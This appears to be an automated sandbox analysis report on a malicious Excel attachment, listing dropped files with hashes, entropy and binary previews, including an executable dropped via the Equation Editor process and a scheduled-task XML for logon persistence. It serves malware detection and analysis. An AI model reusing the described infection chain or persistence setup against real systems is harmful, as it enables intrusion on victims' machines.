                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ua............................~.... ........@.. ....................................@.................................0...K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................`.......H............\..........8...............................................0..........+.&.(....(....:....& ....87...8......(..... ....8 ......(........X.8.... ............E....................9...d...*...N...........u... ....8...... ....8........8....& ....8....(.... ....8..... ....(.... ....8......o....?C... ....8k.....(.... ....8Z....*...J+.&.........o....*.>+.&......(....*>+.&......(....*.+.&..(....*.+.&..*..+.&..*..0..........+.&..~......e(........8.....*....0..........+.&.
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3DB8310A.emf
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                      Category:dropped
                      Size (bytes):498420
                      Entropy (8bit):0.6413596474572152
                      Encrypted:false
                      SSDEEP:384:oDy7XXwBkNWZ3cJuUvmWnTG+W4DH8ddxzsFfW3:oAXwBkNWZ3cjvmWa+VDO
                      MD5:B128C929EE5A1D5C64DD1610FDF21B65
                      SHA1:01319DC2BA610286A5D0C5BD6E08662117E3E42A
                      SHA-256:C8949BCC6E9256F2D3091750D7DC282269107D8BDBF5DB4FF1E437366370F7E5
                      SHA-512:589CEA37B8492DBF09325CF483D942655398E2655B004985C57DEB730855839749A8F575B7C50252C7D3F8AC8381DAC856D44B0C099F4354B38DBE2534AA5808
                      Malicious:false
                      Reputation:low
                      Preview: ....l...............2...........m>..C... EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................([$...0...f2[.@7.%......P.........4..RQ9\................$Q9\...... ...Id2[...... ............d2[........................................%...X...%...7...................{$..................C.a.l.i.b.r.i...........@..X..........8*[........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....2.......L.......................P... ...6...F....F...F..EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5E16820E.jpeg
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                      Category:dropped
                      Size (bytes):85020
                      Entropy (8bit):7.2472785111025875
                      Encrypted:false
                      SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                      MD5:738BDB90A9D8929A5FB2D06775F3336F
                      SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                      SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                      SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\74AB189.png
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:PNG image data, 543 x 105, 8-bit colormap, non-interlaced
                      Category:dropped
                      Size (bytes):4881
                      Entropy (8bit):7.874347438417876
                      Encrypted:false
                      SSDEEP:96:PEnLO8a+6qOuqh3GInWGQotMlMf/ecf6EfQC7QOD0HlpDG9zmGoQT39:YLna+6qOuqhGnGQotMl0Wy6EfQC82iDw
                      MD5:650F70216A555A155D53B55A8A3636C7
                      SHA1:AB035DDA543660AB22E6D9B5E730E5E396151961
                      SHA-256:9CC4C37955BF1CC333D5440787D21AC2D22E86FF8F36F93993ED4E2277FB63C2
                      SHA-512:45A358C44A41FC04527C1F8879F43559A24FE88E87F827A4EC6F40E8D50F26CB3D67BA4D37D2778FDE70663985C5E92FAA6331A01FDB991AF821D98072AC3396
                      Malicious:false
                      Reputation:low
                      Preview: .PNG........IHDR.......i......g......PLTE......................................................................................................................................................................................................................................................................................................................................................................................................................}..r..p..b..V.M.I.K.:.=..A..4..4..1..,.........u.........u&.m1.Q'.j9.]M.tZ.|b..U..y..n..g.k.nY.{.s..................................................................................k..{..........w.....u.....y..q..e.._..V..P~.Q..B..Er.&u.*a.(X.'O.3^.SQ.ppqgfx.gmpch}Sbt7Ut&Pw&Lv&Ck&6v&&Q&&[&4Q,LP&rK&_?&P&&&..&&&4""L&&o..m..Nx....tRNS....}....IDATx...PSW.......Y.SB.3..b.`.7....k\.[*.n...g..h......*P..R.........AD@xV..).\ .dd..:2.cg......77..M...L...=..s>.sI..E'..k..<.NlJc0.l:....H.o.CH......8.a..q.JE.a
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\77E899F6.jpeg
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 407x282, frames 3
                      Category:dropped
                      Size (bytes):17844
                      Entropy (8bit):7.825721228024893
                      Encrypted:false
                      SSDEEP:192:e6Vwm4gVXh9eXATwEsJHqBKQfnDLr3SQQQW/6wzueC+YTizJ4e3pXhI3nMMMMQLx:Zi4R9JT2pv//zuebYu+eZUnMMMMpI3
                      MD5:A0787917E85692914753F4DEF52B6B56
                      SHA1:0CBC4CE2DE5C6E35229B466BA5A5778881A79D29
                      SHA-256:B67BDAA833D1522D5FA4A9B2053D226BB50E7169468643CFB3E61E6F90B97770
                      SHA-512:CF576CEC633CA91F1F7FFC1C228C28415CB5885FFC5952932C871F99771009452669255554A4C5B20AE9ECC42442CDDF64D47649DA30CA80B911F93A0C451691
                      Malicious:false
                      Preview: ......JFIF..............Exif..MM.*......@........:..@..................C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....o.z..y?....;M....K.q#\\..!`6p9 .......VQn...T.J.L.+N......c4..d..Qv..F...x#..z...Y.m.4.;.p...6(.m.a.O#.......]o...i6...+....S.O.....4.8&..'. ...MR.k.qK.1.b..F6.L0H..t..5..+......r.......JHf..%.r.'."....T.l..|....n....I....~f.vO.8..U..I....?.....0.Q.9lam...^H.`...g..x88..8<..{.....u$..okn...o...#zc..=EO.n..].9J+s.7
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\87CB7174.jpeg
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                      Category:dropped
                      Size (bytes):85020
                      Entropy (8bit):7.2472785111025875
                      Encrypted:false
                      SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                      MD5:738BDB90A9D8929A5FB2D06775F3336F
                      SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                      SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                      SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                      Malicious:false
                      Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8DCFAE5.png
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:PNG image data, 550 x 360, 8-bit colormap, non-interlaced
                      Category:dropped
                      Size (bytes):15625
                      Entropy (8bit):7.975433466796902
                      Encrypted:false
                      SSDEEP:384:3quMy4uOwJYk5DcUWbdfFZBa7Q9bvC78yPelujgXolFo:6Zk5DcU+FXhavB/lFo
                      MD5:79996F390643F9E11F14334A3740FA5E
                      SHA1:3A99EC9B5E2057264FFE629D3ABA182912EDB80E
                      SHA-256:406EE07DA7DEB2B38B87074EA55980BFE3FEFBD57E50AE7D25502D67A711B15C
                      SHA-512:BDD3DB6E24418C0F8B74D79F3B0DDFFAF96A5CD2ABE0D45AEEC5E53EA17B0AD17B239C26781FD5BE34CAC3582F24773BF3FEF0616F6BE024117C1A2DB9A3F0B2
                      Malicious:false
                      Preview: .PNG........IHDR...&...h.....T......bPLTE..."...P........{......P]............Fx....]..i..bb...,...........K.....................}..........=.....3.....srs...k.....QPR.~.........es.??@...keb"u.]\]x..1h......td..{.....**,...A..odz.....*Q..qAXf............>............u...hXr.y......MTx......R..l..........................K8V%[......=.9nwQT..9.........._=..>.y.^LA.(...R.....;bIDATx..X.o.@.....G..E...6,F.M..T...UZ,!Y!...fIH(........h.?.k..x...%....P...D!...L..2).....G..c.d.+......&:.+........OQ..._..T......%>......e%4.fR......t.3..w..$Xp.6........L..=.vu.X..6......*.W.G.4..Y.c.*...2c....|i....#...~_.Z.66}....l.\...... .L|..zk.G.."..)8. .&&....SN(.7...W...m_ J...<<..$..k.B.F...Q....hs.2!I.s..T...7e4D....E...c.bDl!...C.....t#...*p7.U.#t...32......uy;.....j'.j.#.G.C.. Z...(V.j.#|..b...o.....R=....t.0Wf.r..?..c..R..9.........i.j.y[...A.c.F.uO.M.j...&.q..9T..k.-.+.<.zZ.<...6..rT..W..]..St._....h5^..2.3F.....r~+.8z.......+..[<..._.8...8v....`.o
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B93D533B.png
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:PNG image data, 543 x 105, 8-bit colormap, non-interlaced
                      Category:dropped
                      Size (bytes):4881
                      Entropy (8bit):7.874347438417876
                      Encrypted:false
                      SSDEEP:96:PEnLO8a+6qOuqh3GInWGQotMlMf/ecf6EfQC7QOD0HlpDG9zmGoQT39:YLna+6qOuqhGnGQotMl0Wy6EfQC82iDw
                      MD5:650F70216A555A155D53B55A8A3636C7
                      SHA1:AB035DDA543660AB22E6D9B5E730E5E396151961
                      SHA-256:9CC4C37955BF1CC333D5440787D21AC2D22E86FF8F36F93993ED4E2277FB63C2
                      SHA-512:45A358C44A41FC04527C1F8879F43559A24FE88E87F827A4EC6F40E8D50F26CB3D67BA4D37D2778FDE70663985C5E92FAA6331A01FDB991AF821D98072AC3396
                      Malicious:false
                      Preview: .PNG........IHDR.......i......g......PLTE......................................................................................................................................................................................................................................................................................................................................................................................................................}..r..p..b..V.M.I.K.:.=..A..4..4..1..,.........u.........u&.m1.Q'.j9.]M.tZ.|b..U..y..n..g.k.nY.{.s..................................................................................k..{..........w.....u.....y..q..e.._..V..P~.Q..B..Er.&u.*a.(X.'O.3^.SQ.ppqgfx.gmpch}Sbt7Ut&Pw&Lv&Ck&6v&&Q&&[&4Q,LP&rK&_?&P&&&..&&&4""L&&o..m..Nx....tRNS....}....IDATx...PSW.......Y.SB.3..b.`.7....k\.[*.n...g..h......*P..R.........AD@xV..).\ .dd..:2.cg......77..M...L...=..s>.sI..E'..k..<.NlJc0.l:....H.o.CH......8.a..q.JE.a
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CD2DD57F.png
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
                      Category:dropped
                      Size (bytes):68702
                      Entropy (8bit):7.960564589117156
                      Encrypted:false
                      SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
                      MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
                      SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
                      SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
                      SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
                      Malicious:false
                      Preview: .PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.*Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y..*.v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..|..8...
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D5668C01.png
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
                      Category:dropped
                      Size (bytes):68702
                      Entropy (8bit):7.960564589117156
                      Encrypted:false
                      SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
                      MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
                      SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
                      SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
                      SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
                      Malicious:false
                      Preview: .PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.*Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y..*.v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..|..8...
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F809BC00.jpeg
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 407x282, frames 3
                      Category:dropped
                      Size (bytes):17844
                      Entropy (8bit):7.825721228024893
                      Encrypted:false
                      SSDEEP:192:e6Vwm4gVXh9eXATwEsJHqBKQfnDLr3SQQQW/6wzueC+YTizJ4e3pXhI3nMMMMQLx:Zi4R9JT2pv//zuebYu+eZUnMMMMpI3
                      MD5:A0787917E85692914753F4DEF52B6B56
                      SHA1:0CBC4CE2DE5C6E35229B466BA5A5778881A79D29
                      SHA-256:B67BDAA833D1522D5FA4A9B2053D226BB50E7169468643CFB3E61E6F90B97770
                      SHA-512:CF576CEC633CA91F1F7FFC1C228C28415CB5885FFC5952932C871F99771009452669255554A4C5B20AE9ECC42442CDDF64D47649DA30CA80B911F93A0C451691
                      Malicious:false
                      Preview: ......JFIF..............Exif..MM.*......@........:..@..................C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....o.z..y?....;M....K.q#\\..!`6p9 .......VQn...T.J.L.+N......c4..d..Qv..F...x#..z...Y.m.4.;.p...6(.m.a.O#.......]o...i6...+....S.O.....4.8&..'. ...MR.k.qK.1.b..F6.L0H..t..5..+......r.......JHf..%.r.'."....T.l..|....n....I....~f.vO.8..U..I....?.....0.Q.9lam...^H.`...g..x88..8<..{.....u$..okn...o...#zc..=EO.n..].9J+s.7
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FF8CFBA2.png
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:PNG image data, 838 x 469, 8-bit colormap, non-interlaced
                      Category:dropped
                      Size (bytes):21987
                      Entropy (8bit):7.952828365949915
                      Encrypted:false
                      SSDEEP:384:MoaqtIZxNY3dMzKeijXyso4gYhVZAUrE68p/DazS396RFnDUhkhiedxQ9:AqtIZzYNM+HjXyjOhVZW68pPWGedO9
                      MD5:5A25F525D9F0D658AF52A4F78FE031D4
                      SHA1:525FB63F75E745FBC90E4E42E624E030C5DF94EB
                      SHA-256:D791841D657B6D2A9E5ED1B7F8548B1044A2C7EC62D05846C72D8556DB9E9BC8
                      SHA-512:FE2F2D9744CE7235F4DBC36861249372C42B85920B6A1C75A8B2C330BD07F7C4C12A5DF5CA9AAED4C2BCDAD9D196DFF3A34732EE296FE6F006A16ACC41F5EEC3
                      Malicious:false
                      Preview: .PNG........IHDR...F................PLTE...0.....T[c..........................f..................9.....d.........k9u....b...........9....f..kr............t.......e.......9....]X........./.;9.................h..........d.<...({...........t_.....................c7..Ga.06?....._..V.....T..............9......e......ee...........f......:;.D."...h..............e...............Q....E.......l..~..t"....D.............................:....9...........T.........^..d9;....iv...09.Z...........................................................................$...ee9h.G..........................................~........................................;<.........`....................99....5..............................................................AL...R.IDATx...`..&.H......-@.n..]A... ..Fn.!`$X..&&..X@$c..dl<.#...PD....$&".1..h.N..Y3..L6.d.$.XFw..;&(a....=.:..Z].].Q....S..;.?...W%.D....1..s.!....4....`{U'.QU........~.e.*....
                      C:\Users\user\AppData\Local\Temp\tmp98E5.tmp
                      Process:C:\Users\Public\vbc.exe
                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1626
                      Entropy (8bit):5.161163146860485
                      Encrypted:false
                      SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBZtn:cbhZ7ClNQi/rydbz9I3YODOLNdq3V
                      MD5:2B2CEB38AB3A3F85E4611975CDEE1382
                      SHA1:E10424536A29F80C9B1E48FBCC0FBF5B6EED6A71
                      SHA-256:C372C5B568878A69AB28CD544118DF4ABE1372A95F09AB2ADF357AA788059F95
                      SHA-512:94A8F688D99E0D2AD07AB912B94305AA27B78351819937CBAFFAB5ACA9606224F46D33F9761BB2E283B22A4DEA0E08DC4A234E2C1F44D9346C6A8F5CA62A4600
                      Malicious:true
                      Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                      C:\Users\user\AppData\Roaming\CXFxEHIAOoJFws.exe
                      Process:C:\Users\Public\vbc.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):1085952
                      Entropy (8bit):7.900410175742084
                      Encrypted:false
                      SSDEEP:24576:vT120Gers/orbvtIeOIPr6e/kbHYI42Pv+1vVi:vhqC4o+l4rLsbHz42Pu
                      MD5:5DC1D41E2F9969D85896921F7B4AE261
                      SHA1:8DAE6EB305EAD57EEDDFDECBF34CCA61AF653973
                      SHA-256:2A95FEDE08D035E26D8A261C58359901344D23395094BD51F32E868964D61634
                      SHA-512:96AA1DC7A5780FE484120B32CA2B66234450787370A0CC7B25AFBFFDE7C4AE5DBFF84FC496C8D92FF8AB3507FDFA361CF055E2910B72085F02956647A240FB63
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ua............................~.... ........@.. ....................................@.................................0...K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................`.......H............\..........8...............................................0..........+.&.(....(....:....& ....87...8......(..... ....8 ......(........X.8.... ............E....................9...d...*...N...........u... ....8...... ....8........8....& ....8....(.... ....8..... ....(.... ....8......o....?C... ....8k.....(.... ....8Z....*...J+.&.........o....*.>+.&......(....*>+.&......(....*.+.&..(....*.+.&..*..+.&..*..0..........+.&..~......e(........8.....*....0..........+.&.
                      C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\catalog.dat
                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):216
                      Entropy (8bit):7.012278113302776
                      Encrypted:false
                      SSDEEP:6:X4LDAnybgCFgwOp7Lr8gVyTwvMV84Miuk:X4LEnybgCF7wHJyCe8Oh
                      MD5:0FA1BE38A5A8D2A56F48982C3E9142A6
                      SHA1:28E5B087E687E57D4AB6DB352A493AA5657C8484
                      SHA-256:4CFA0E50D93A65C81B5CF800F4970E7AD0F7324E0220D1EE91B27D0C0F289493
                      SHA-512:F50CA947DCB4F673FADFB6C5F1D9B0FD541679AFD6A03B14719789288A646C4C1762F3E89B8A01B3A87420FDA802B21E5FA109F1FF088898607552172298D83A
                      Malicious:false
                      Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h.P.vY.........S.5.6.C4..E.Y.|........).zs...w.gl..\.G..J.M.vES.0....P.:..6...T....+5.1............r.P.V..+..(.*2d.f... ..q.. 7iO.+..c.....!.'.*..mL|X
                      C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat
                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                      File Type:Non-ISO extended-ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):8
                      Entropy (8bit):3.0
                      Encrypted:false
                      SSDEEP:3:uJV31:ubl
                      MD5:822151CFCE66B2681EDE597A22A09BC2
                      SHA1:40BC576B2099E732EA98DFC27F0E8ECCA24EBD56
                      SHA-256:79991485D1E211CEF2EC0A62B27598D6FA4C0CCA96BF833BA4743EA3AE025DD3
                      SHA-512:3D43F5B84B461F2E235B4ED69D9DB796A888C03BAD09FF17B2AD15A496E8718FFF5E4C8DDA6C07D64E9A48BC4970083C5CE99B2471180E5AA8938139AC7C6E09
                      Malicious:true
                      Preview: M..p..H
                      C:\Users\user\Desktop\~$Sts Global Order.xlsx
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):165
                      Entropy (8bit):1.4377382811115937
                      Encrypted:false
                      SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                      MD5:797869BB881CFBCDAC2064F92B26E46F
                      SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                      SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                      SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                      Malicious:false
                      Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      C:\Users\Public\vbc.exe
                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):1085952
                      Entropy (8bit):7.900410175742084
                      Encrypted:false
                      SSDEEP:24576:vT120Gers/orbvtIeOIPr6e/kbHYI42Pv+1vVi:vhqC4o+l4rLsbHz42Pu
                      MD5:5DC1D41E2F9969D85896921F7B4AE261
                      SHA1:8DAE6EB305EAD57EEDDFDECBF34CCA61AF653973
                      SHA-256:2A95FEDE08D035E26D8A261C58359901344D23395094BD51F32E868964D61634
                      SHA-512:96AA1DC7A5780FE484120B32CA2B66234450787370A0CC7B25AFBFFDE7C4AE5DBFF84FC496C8D92FF8AB3507FDFA361CF055E2910B72085F02956647A240FB63
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ua............................~.... ........@.. ....................................@.................................0...K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................`.......H............\..........8...............................................0..........+.&.(....(....:....& ....87...8......(..... ....8 ......(........X.8.... ............E....................9...d...*...N...........u... ....8...... ....8........8....& ....8....(.... ....8..... ....(.... ....8......o....?C... ....8k.....(.... ....8Z....*...J+.&.........o....*.>+.&......(....*>+.&......(....*.+.&..(....*.+.&..*..+.&..*..0..........+.&..~......e(........8.....*....0..........+.&.

                      Static File Info

                      General

                      File type:CDFV2 Encrypted
                      Entropy (8bit):7.961139155267275
                      TrID:
                      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                      File name:Sts Global Order.xlsx
                      File size:274680
                      MD5:32f28af7bfd53e685b4cb23daa435ac1
                      SHA1:2b8161a2ff19950d6767cc1adbd7b85af04a335b
                      SHA256:52601a9c0c289aa1e3de03a32f2c7c2d47c94685e3bc58b06c6932f1b65a88ca
                      SHA512:1021cf15cfae872dd467e7f7476d0d2cd1e7fe953e4f0fe91fda7c450bda6cf46ca9fa01cfab7ddd0dbcb0d59ecb90b9eb5fba2579fc7dcfe8d25166b44f80b9
                      SSDEEP:6144:Os23Zvvc9FXCMR9++O4uxeUXh2Uc+iQVXkFX:i3JcrD0+O4uxeUXcl+ikU9
                      File Content Preview:........................>......................................................................................................................................................................................................................................

                      File Icon

